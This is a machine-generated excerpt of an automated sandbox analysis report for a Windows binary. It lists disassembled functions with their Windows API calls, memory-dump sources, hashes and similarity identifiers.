                                                                                                                                                                                                                                                                                    • Instruction ID: f5754915ff21b44eeb01f86e3030e8eb49bf84224be69aa35e7872efc63caf32
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8aeabb7a1823a17ed2da41221fbf133d6effa521abfdb8e4e10ee2b8d36e1b80
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE31F272605716ABD720DF14C845F9B77E9FFC4354F00092AF89997181DA34EA48CB91
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 00B455F9
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B45616
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B4564E
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B4566C
                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00B45674
                                                                                                                                                                                                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00B4567E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 72514467-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 13ddee62895c96d4ff1be6c643088615533849dd0bce649ed99136543493a6e1
                                                                                                                                                                                                                                                                                    • Instruction ID: 61764f7a7372105855bed2b0f3fcd4418cbd949eb9a64f1733a21af2605907d2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13ddee62895c96d4ff1be6c643088615533849dd0bce649ed99136543493a6e1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B212632204A007BEB256B289C49F7B7FECDF45750F1580A9F809DA092EF70CE41A660
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AE55D1,?,?,00B24B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00AE5871
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B562C0
                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00B563DA
                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00B80CC4,00000000,00000001,00B80B34,?), ref: 00B563F3
                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00B56411
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                                                                    • String ID: .lnk
                                                                                                                                                                                                                                                                                    • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                                                                    • Opcode ID: 07b1ff2511df9534828d3895e9b98e630c476c1d3eac27bb8b9e14161778cbdb
                                                                                                                                                                                                                                                                                    • Instruction ID: ea3e1ea3fc4e38a22eca110bbb0fb5ebed212cb8186dee34d6ba6482d665a25f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07b1ff2511df9534828d3895e9b98e630c476c1d3eac27bb8b9e14161778cbdb
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66D14271A082019FC714DF29C584A2ABBF5FF89715F54889CF8899B361DB31EC49CB92
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00B78740
                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00B78765
                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B7877D
                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00B787A6
                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00B5C1F2,00000000), ref: 00B787C6
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00AE24B0
                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00B787B1
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2294984445-0
                                                                                                                                                                                                                                                                                    • Opcode ID: bf7ef255e6375acb8282b659d5415f046fd90186ed8e74280a46bcbf905de40e
                                                                                                                                                                                                                                                                                    • Instruction ID: 984403cb2fd480c784d9f8afc48e8905974c281cd6e4bdde0d05985ea49e9439
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf7ef255e6375acb8282b659d5415f046fd90186ed8e74280a46bcbf905de40e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90217C716512419FCB289F39CC48A6A3BF6EF84365F248669A93BD31E0DE708C50DB20
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00B036E9,00B03355), ref: 00B03700
                                                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B0370E
                                                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B03727
                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00B036E9,00B03355), ref: 00B03779
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                    • Opcode ID: a71b39fc16fa8f77b04785ecead54ace1dbd5dc8006bf57c13e92e054c6a4bdd
                                                                                                                                                                                                                                                                                    • Instruction ID: fadc0c57d49ef327e8b9ef96e326eeb39afb602055536a40fbb32ac6730a3ccc
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a71b39fc16fa8f77b04785ecead54ace1dbd5dc8006bf57c13e92e054c6a4bdd
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B01D4B661E3116EE63527B8ACDE96A2EECEB16FB172003B9F211460F1FF524D425140
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00B04D53,00000000,?,?,00B068E2,?,?,00000000), ref: 00B130EB
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1311E
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B13146
                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000), ref: 00B13153
                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000), ref: 00B1315F
                                                                                                                                                                                                                                                                                    • _abort.LIBCMT ref: 00B13165
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                    • Opcode ID: f4a068eaa6f3b364c10d5200e8e406dc2cfe0acfb3e2966f133ded3cc795540f
                                                                                                                                                                                                                                                                                    • Instruction ID: 9a3ed7ce5f4205e333341dea99cf6b0d968aa46a34443771df3b20048843533a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4a068eaa6f3b364c10d5200e8e406dc2cfe0acfb3e2966f133ded3cc795540f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07F0A47654450076C2122735AC47ADA26EADFC2F70BA104E9F92CF32D1FE608AE24161
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AE1F87
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE1F2D: SelectObject.GDI32(?,00000000), ref: 00AE1F96
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE1F2D: BeginPath.GDI32(?), ref: 00AE1FAD
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE1F2D: SelectObject.GDI32(?,00000000), ref: 00AE1FD6
                                                                                                                                                                                                                                                                                    • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00B794AA
                                                                                                                                                                                                                                                                                    • LineTo.GDI32(?,00000003,00000000), ref: 00B794BE
                                                                                                                                                                                                                                                                                    • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00B794CC
                                                                                                                                                                                                                                                                                    • LineTo.GDI32(?,00000000,00000003), ref: 00B794DC
                                                                                                                                                                                                                                                                                    • EndPath.GDI32(?), ref: 00B794EC
                                                                                                                                                                                                                                                                                    • StrokePath.GDI32(?), ref: 00B794FC
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 43455801-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 83bb2c3e2e3af0f93f8de542ec60be87b875a06dc7ecd8f23add9fb77bce12dd
                                                                                                                                                                                                                                                                                    • Instruction ID: a6ac6a97311f1b43cb7f279f3a91e0a2012c381ff3e3c92e913e7bd0dbdd4323
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83bb2c3e2e3af0f93f8de542ec60be87b875a06dc7ecd8f23add9fb77bce12dd
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E110972000109BFEB129F94DC89E9A7FADEF083A0F04C165FA195A1A1CB719D95DBA0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00B45B7C
                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B45B8D
                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B45B94
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00B45B9C
                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00B45BB3
                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00B45BC5
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                    • Opcode ID: c432d9de6063efb31df425a9dddf15bc7724b260f83285cf42fa063c38d30205
                                                                                                                                                                                                                                                                                    • Instruction ID: bd854f137357812e9dc53a2d65504c68d13aae1f747f8390edfd560c5b314a00
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c432d9de6063efb31df425a9dddf15bc7724b260f83285cf42fa063c38d30205
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D014F75A00718BBEB11AFA59C49E4EBFB8EF49751F0040A5FA09A7281DA709D00DBA0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AE32AF
                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00AE32B7
                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AE32C2
                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AE32CD
                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00AE32D5
                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AE32DD
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Virtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 2e6deec630912b9f91a3fa766c1f6763ca43969e78047444dc4707008b10c33d
                                                                                                                                                                                                                                                                                    • Instruction ID: fe99bacd28de09dcda0ea72e1ed604fe23bbc5820bef020c581bb69bdc8643a0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e6deec630912b9f91a3fa766c1f6763ca43969e78047444dc4707008b10c33d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1016CB09017597DE3009F5A8C85B52FFB8FF19354F00411B915C47941C7F5A864CBE5
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B4F447
                                                                                                                                                                                                                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B4F45D
                                                                                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00B4F46C
                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B4F47B
                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B4F485
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B4F48C
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 839392675-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 21325abca50649bc86cfcbe2e75dbd6703bb2618159a832011d544e2aa0de56f
                                                                                                                                                                                                                                                                                    • Instruction ID: bdcb7f5af03f0986460fe81e2dcb0587eec240cb8be383e6045d5254e9131936
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21325abca50649bc86cfcbe2e75dbd6703bb2618159a832011d544e2aa0de56f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66F03032241158BBE72157629C0EEEF3B7CEFC6B51F000058F60AA2190DBA05A81D6B5
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?), ref: 00B234EF
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 00B23506
                                                                                                                                                                                                                                                                                    • GetWindowDC.USER32(?), ref: 00B23512
                                                                                                                                                                                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 00B23521
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00B23533
                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(00000005), ref: 00B2354D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 272304278-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 21b77edc3c28cde26bffc704d019ebfc7e57b75541f0a39fd3dbc9b37b44d936
                                                                                                                                                                                                                                                                                    • Instruction ID: 467caf431a5f736864f838ad9a1609a2f746e566dc14ee549327685fccda1b16
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21b77edc3c28cde26bffc704d019ebfc7e57b75541f0a39fd3dbc9b37b44d936
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9011231500215EFDB505FA4EC09BAA7BF5FF18761F500260FA1EA31A0CF321E91AB10
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B421CC
                                                                                                                                                                                                                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 00B421D8
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B421E1
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B421E9
                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00B421F2
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B421F9
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 146765662-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 2b5a2947f4b3e3bbdf35537cc7dfec5e909e63dc400fafab70b52c1d57f82ac5
                                                                                                                                                                                                                                                                                    • Instruction ID: 6b0b4d792cc2b945106ad2f32c496b571e331ba2301f300293f503618a47a9d3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b5a2947f4b3e3bbdf35537cc7dfec5e909e63dc400fafab70b52c1d57f82ac5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4E0E576004105BBDB011FA1EC0C90ABF39FF493A2B504220F22A97870CF3294A0DB50
